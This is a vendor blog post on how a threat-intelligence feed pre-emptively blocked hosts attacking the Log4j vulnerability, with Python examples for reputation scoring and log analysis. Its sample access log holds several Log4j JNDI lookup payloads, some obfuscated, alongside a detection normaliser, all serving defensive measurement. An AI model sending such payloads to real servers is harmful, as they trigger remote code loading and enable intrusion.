Threat Intelligence vs Log4j

by Dave Blakey on Security • December 14, 2021

As many of you will already know, the Log4j vulnerability has been making waves in the industry. We put out a post last week on how we mitigate the attack (read more on CVE-2021-44228), but something we haven't spoken about is how effective our threat intelligence platform has been at preventing it, and the insights a platform like NovaSense gives you.

NovaSense is a threat intelligence platform that lists abusers, botnets, cybercrime, and malware hosts, enabling pre-emptive defense by cyber security teams. It's powered by Snapt Nova's AI- and ML-based blocking and responds very quickly to global threats by listing the dangerous hosts that are trying to exploit users, rather than just the exploit itself.

We'll go into more detail below, but NovaSense was already listing over 98% of the hosts we have seen attempting Log4j attacks before the vulnerability was announced!

How NovaSense Learns

NovaSense receives reports of all anomalies and WAF blocks from the Nova WAF network, giving it tens of thousands of sources of threat information and generating millions of threat signals an hour.

We can see a real example of a threat signal that was sent to NovaSense by a Nova WAF earlier today below:

NovaSense collates these massive amounts of data and feeds them all through its machine learning engine for IP reputation and threat analysis, which decides two things:

  1. Is this a threat?
  2. If so, what is the score of this threat?

What comes out the other side is a threat signal that looks like this:

This information is then used by direct clients of NovaSense, as well as by embedded solutions like Nova. On the Snapt Nova WAF, for example, it shows up as seen below:
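To make the pipeline above concrete, here is a small IP-reputation aggregator in the same spirit: many WAF edges report blocks, the aggregator groups the reports per IP, answers "is this a threat?" and "what is its score?", and emits a signal that a consuming WAF can turn into a block. This is an added example written for this article, not NovaSense's code or schema; the report fields, category weights, recency factors, corroboration bonus and threshold are all assumptions, and the sample reports are constructed.

```python
"""
Hypothetical IP-reputation aggregator (added example, not Snapt's code).
Assumed schema: each report is {"ip", "source", "category", "ts"}.
"""
from collections import defaultdict
from dataclasses import dataclass, asdict
from datetime import datetime

# Constructed sample block reports, as WAF edges might send them. Schema assumed.
SAMPLE_REPORTS = [
    {"ip": "203.0.113.7",  "source": "waf-a", "category": "rfi",        "ts": "2021-12-01T10:00:00"},
    {"ip": "203.0.113.7",  "source": "waf-b", "category": "sqli",       "ts": "2021-12-02T11:30:00"},
    {"ip": "203.0.113.7",  "source": "waf-c", "category": "scanner",    "ts": "2021-12-08T09:15:00"},
    {"ip": "198.51.100.9", "source": "waf-a", "category": "rfi",        "ts": "2021-12-10T02:00:00"},
    {"ip": "198.51.100.9", "source": "waf-a", "category": "rfi",        "ts": "2021-12-10T02:01:00"},
    {"ip": "192.0.2.44",   "source": "waf-d", "category": "rate_limit", "ts": "2021-11-20T00:00:00"},
]

# Assumed weights: an attack payload counts for more than noisy behaviour.
CATEGORY_WEIGHT = {"rfi": 3.0, "sqli": 3.0, "scanner": 1.5, "rate_limit": 0.5}
THREAT_THRESHOLD = 4.0   # assumed cut-off for "is this a threat?"
MAX_CORROBORATION = 3.0  # cap on the bonus for many independent reporters
NOW = "2021-12-14T12:00:00"  # fixed "current time" so the example is reproducible


@dataclass(frozen=True)
class ThreatSignal:
    ip: str
    is_threat: bool
    score: float
    sources: int
    categories: tuple
    first_seen: str
    last_seen: str


def recency_factor(ts: datetime, now: datetime) -> float:
    """Recent behaviour counts fully; older reports decay in two steps (assumed)."""
    age_days = (now - ts).days
    if age_days <= 7:
        return 1.0
    if age_days <= 30:
        return 0.5
    return 0.25


def score_ip(reports: list, now: datetime) -> ThreatSignal:
    """Turn all reports about one IP into a single threat signal."""
    raw = 0.0
    for r in reports:
        ts = datetime.fromisoformat(r["ts"])
        raw += CATEGORY_WEIGHT.get(r["category"], 1.0) * recency_factor(ts, now)
    sources = {r["source"] for r in reports}
    # Independent corroboration raises confidence: +50% per extra reporter, capped.
    corroboration = min(1.0 + 0.5 * (len(sources) - 1), MAX_CORROBORATION)
    score = round(min(raw * corroboration, 100.0), 2)
    timestamps = sorted(r["ts"] for r in reports)
    return ThreatSignal(
        ip=reports[0]["ip"],
        is_threat=score >= THREAT_THRESHOLD,
        score=score,
        sources=len(sources),
        categories=tuple(sorted({r["category"] for r in reports})),
        first_seen=timestamps[0],
        last_seen=timestamps[-1],
    )


def aggregate(reports: list, now_iso: str = NOW) -> dict:
    """Group reports per IP and score each one. Returns {ip: ThreatSignal}."""
    now = datetime.fromisoformat(now_iso)
    by_ip = defaultdict(list)
    for r in reports:
        by_ip[r["ip"]].append(r)
    return {ip: score_ip(rs, now) for ip, rs in by_ip.items()}


def blocklist(signals: dict) -> set:
    """The hosts a consuming WAF would deny outright."""
    return {ip for ip, s in signals.items() if s.is_threat}


if __name__ == "__main__":
    for sig in aggregate(SAMPLE_REPORTS).values():
        print(asdict(sig))
```

With the constructed reports, 203.0.113.7 is reported by three different WAFs for three different things and scores highest even though none of its reports is very recent; 198.51.100.9 is reported only once but with an attack payload, so it still crosses the threshold; 192.0.2.44 tripped a single rate limit weeks ago and is not listed. The point of the corroboration term is the "shared" part of shared threat intelligence: the same host hitting many unrelated sites is far stronger evidence than one site's opinion.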

How This Protects You

There are many components of the NovaSense platform, but there are a few particular observations that I want to dig into.

Shared Threat Information Spreads Protection Faster

Firstly, because of the large footprint of Nova WAFs and the shared nature of threat information, as soon as Nova WAFs start reporting blocks to NovaSense, NovaSense issues threat signals that let everyone start blocking the dangerous hosts, often within 1-2 minutes of those hosts starting to attack sites.

That means it's very likely that when an attack like this starts you are protected without knowing it, because you are unlikely to be one of the first sites attacked. Naturally, the Nova WAF blocked these requests anyway, but NovaSense can also be integrated into other platforms.

Pre-Emptive Defense Targets Attackers, Not Just The Attack

Secondly, and most importantly, over 98% of the hosts actively trying to exploit the Log4j vulnerability on our systems were already listed on NovaSense: they had been identified for blocking BEFORE the vulnerability came out.

That's because these compromised or abusive systems are often involved in other attacks: they are part of botnets, have sent abusive requests before, and so on. This is where threat intelligence really shines.

As we mentioned, Nova already had a pre-emptive block for remote file inclusion that covered Log4j exploits, and we released a targeted one last week. But even if this vulnerability had not been identified and publicized, NovaSense was already blocking the vast majority of the systems trying to exploit it. The two layers complement each other: the reputation list stops known-bad hosts regardless of the payload they send, and the WAF rules catch the small remainder with no prior history.
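If you want to measure this "already listed before the announcement" figure for your own traffic, the calculation is straightforward: pull the hosts that sent Log4j probes out of your access logs, then check each one's listing date against the disclosure date. The following is an added example for this article, not NovaSense tooling: the access-log lines, the listing dates and the announcement date used as the cut-off are all constructed, and the JNDI detection is a deliberately small normaliser that covers the commonly reported `${lower:j}`, `${::-j}` and `${env:X:-j}` obfuscations, not a complete WAF rule.

```python
"""
Measure pre-emptive coverage: of the hosts seen sending Log4j probes, how many
were on the reputation list before the vulnerability was announced?
Added example with constructed data; not NovaSense code.
"""
import re
from datetime import datetime

# Constructed access-log lines (combined log format). The JNDI strings are the
# widely reported Log4j probe patterns, including three common obfuscations.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 403 0 "-" "${jndi:ldap://203.0.113.7:1389/a}"
198.51.100.9 - - [11/Dec/2021:03:20:41 +0000] "GET /?q=${${lower:j}ndi:ldap://198.51.100.9/x} HTTP/1.1" 403 0 "-" "curl/7.68.0"
192.0.2.44 - - [12/Dec/2021:17:02:55 +0000] "GET /login HTTP/1.1" 403 0 "-" "${${::-j}ndi:rmi://192.0.2.44:1099/o}"
192.0.2.99 - - [13/Dec/2021:08:22:01 +0000] "POST /api HTTP/1.1" 403 0 "-" "${${env:NaN:-j}ndi:dns://192.0.2.99/p}"
198.51.100.77 - - [13/Dec/2021:09:00:12 +0000] "GET /index.html HTTP/1.1" 403 0 "-" "${jndi:ldap://198.51.100.77/z}"
203.0.113.200 - - [13/Dec/2021:09:01:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Constructed listing dates: when each host first appeared on the reputation list.
LISTED_AT = {
    "203.0.113.7": "2021-11-28",
    "198.51.100.9": "2021-12-03",
    "192.0.2.44": "2021-12-02",
    "192.0.2.99": "2021-12-12",
}
ANNOUNCED_AT = "2021-12-10"  # assumed cut-off date for "before the announcement"

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" \d+ \S+ "[^"]*" "([^"]*)"')
# Resolve the simplest lookup tricks so the literal "${jndi:" becomes visible.
LOOKUP_OBFUSCATION = [
    (re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.I), lambda m: m.group(1)),  # ${lower:j} -> j
    (re.compile(r"\$\{[^{}]*:-([^{}]*)\}"), lambda m: m.group(1)),               # ${x:-j}, ${::-j} -> j
]
JNDI_RE = re.compile(r"\$\{jndi:", re.I)


def normalize_lookups(s: str, max_rounds: int = 5) -> str:
    """Repeatedly collapse innermost obfuscating lookups, bounded to avoid loops."""
    for _ in range(max_rounds):
        before = s
        for pattern, repl in LOOKUP_OBFUSCATION:
            s = pattern.sub(repl, s)
        if s == before:
            break
    return s


def is_log4j_probe(field: str) -> bool:
    return JNDI_RE.search(normalize_lookups(field)) is not None


def attacking_hosts(log_text: str) -> set:
    """Source IPs that sent a JNDI lookup in the request line or User-Agent."""
    hosts = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, request, user_agent = m.groups()
        if is_log4j_probe(request) or is_log4j_probe(user_agent):
            hosts.add(ip)
    return hosts


def preemptive_coverage(hosts: set, listed_at: dict, announced_at: str) -> dict:
    """Split attacking hosts by whether they were listed before the cut-off."""
    cutoff = datetime.fromisoformat(announced_at)
    pre, post, never = set(), set(), set()
    for ip in hosts:
        if ip not in listed_at:
            never.add(ip)
        elif datetime.fromisoformat(listed_at[ip]) < cutoff:
            pre.add(ip)
        else:
            post.add(ip)
    return {
        "pre_listed": sorted(pre),
        "listed_after": sorted(post),
        "never_listed": sorted(never),
        "fraction_pre_listed": len(pre) / len(hosts) if hosts else 0.0,
    }


if __name__ == "__main__":
    hosts = attacking_hosts(SAMPLE_ACCESS_LOG)
    print(preemptive_coverage(hosts, LISTED_AT, ANNOUNCED_AT))
```

On the constructed data three of the five probing hosts were listed before the cut-off, one was listed two days after, and one never appears on the list; the "listed_after" and "never_listed" buckets are the ones to look at, since they are exactly the hosts a reputation feed alone would not have stopped and the WAF rule had to catch.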

Examples of Pre-Emptive Blocks

I've included the last two blocks we saw on one of our Nova accounts below, and as you can see both were blocked on NovaSense. Notice, however, that the second example was actually blocked 7 days before the Log4j vulnerability was announced.

If you are interested in learning more about NovaSense, or the Nova platform, please reach out to us and we will be happy to discuss your needs.